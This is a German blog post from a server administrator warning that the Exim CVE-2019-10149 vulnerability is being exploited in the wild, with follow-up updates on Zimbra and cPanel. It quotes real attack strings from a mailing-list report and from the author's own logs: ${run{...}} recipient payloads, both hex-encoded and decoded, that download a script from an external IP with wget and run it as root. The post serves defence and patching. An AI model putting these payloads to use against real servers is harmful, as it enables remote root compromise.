Exim – Exploit in der Wildnis unterwegs

Vor ein paar Tagen ging ja die Exim Root-Schwachstelle durch alle IT-Portale. Wenn Ihr Euch an diesen Beitrag erinnern Exim < 4.92 mit CVE-2019-10149 mögt.Darin hatte ich u.a. auf das Problem und die Lösung hingewiesen.

Was passiert, wenn man nicht reagiert

Heute morgen erreichte die Exim-Mailingliste folgende E-Mail:

hi all,

My mail system has just been hacked; it’s running Debian unstable exim 4.91-9

Could it be CVE-2019-10149? I don’t see any reports of active exploits yet.

The reasons I suspect exim involvement:

• starting today, every 5 mins getting frozen messages:

The following address(es) have yet to be delivered:

root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx: Too many „Received“ headers – suspected mail loop

• the trojan horse scripts, that were successfully installed on my system, with root access, are all group Debian-exim

Luckily, it looks like the trojans did nothing more than repeated attempts to open up my ssh server to root logins, which I think (and hope) didn’t actually work, so I may have been lucky, and the damage isn’t widespread.

ought I to be reporting this anywhere?

Darauf hin habe ich mal die Logs des Servers analysiert, für den ich den kleinen Patch geschrieben habe und seht, was ich dort fand :

2019-06-10 04:31:04 H=(xxxxxxxxxxxxxx.xx) [89.248.171.57] F=<> rejected RCPT <${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2etuked\x20\x26\x26\x20sh\x20\x2froot\x2f\x2etuked\x20\x2dn\x22\x20\x26}}@xxxxxxxxxxxxxx.xx>: Restricted characters in address
2019-06-10 04:31:04 H=(xxxxxxxxxxxxxx.xx) [89.248.171.57] F=<> rejected RCPT <${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ekqvuhtpi\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ekqvuhtpi\x20\x2dn\x22\x20\x26}}@xxxxxxxxxxxxxx.xx>: Restricted characters in address
… und noch ein paar mehr davon …

Ja, sie es versucht, der Exploit ist folglich in der Wildnis unterwegs.

Exploit ist am Werk

Wer jetzt nicht seinen anfälligen Exim wie in Exim < 4.92 mit cve-2019-10149 beschrieben patched oder auf einen neueren Exim updated, der gehört bestraft und wie man oben sieht, wird er das auch.

Schauen wir uns mal an, was da passieren sollte:

${run{/bin/bash -c „wget –no-check-certificate -t 3 -T 75 http://185.162.235.211/ldmxim -O /root/.tuked && sh /root/.tuked -n“ &}

Hier wird also ein in Russland gehostedes Script per wget mit Rootrechten heruntergeladen und ausgeführt. Naja, es „sollte“ ausgeführt werden. Hat ja nicht geklappt, weil der Eximpatch das verhindert hat.

Bei dem gehackten Debianserver kam eine leicht geänderte Anweisung zum Einsatz:

${run{/bin/bash -c „wget –no-check-certificate -T 36 https://185.162.235.211/ldm1ip -O /root/.fabyfmnp && sh /root/.fabyfmnp -n“ &}}

von der selben Gruppe offensichtlich wie bei dem von mir betreuten Server, aber mit einem zufälligen Dateinamen. Ich tippe mal darauf, daß es damit Firewalls schwieriger gemacht werden soll, diese Anweisung gleich zu filtern. Als Firewallregelschreiber würde ich auf „${run“ filtern, aber ok, das ist ja nur meine Meinung :DD

-t meint übrigens retries. Da hat wohl jemand bemerkt, daß er zu viele anfällige Server gleichzeitig attackiert hat und sein Webdienst überlastet war 😀 Auch das größere Timeout mit -T 75 spricht dafür, daß das Ziel wohl schlecht zu erreichen war. Da muß man dann mal  kreativ werden 😉

Update 16:38 Uhr

So langsam kommen die Hackberichte rein. Zimbra scheint von dem EXIM CVE  betroffen zu sein:

https://forums.zimbra.org/viewtopic.php?t=65932&start=120#p290739

Nach dem ich das gelesen habe, kommt bei denen keiner auf Idee den Server durch Reinstallation zu entseuchen? Deren Crontab scheint ihnen dagegen sehr wichtig zu sein.

Update 17:00 Uhr

Die CPanel Supporter haben doch glatt für alte, gar nicht mehr maintainte Versionen ein Update rausgebracht.

Exim CVE-2019-10149, how to protect yourself

Leider ist es natürlich falsch zu behaupten, es gibt keine Gegenmaßnahmen, denn die stehen ja hier oben wirkungsvoll demonstriert zur Verfügung 🙂

Update 17:06 Uhr

Hier gibt es am Ende eine schöne Liste über die Verteilung der Exim Versionen:

Critical Exim flaw exploitable locally and remotely, patch ASAP!

Sehr aufschlussreich, hätte ich gar nicht gedacht.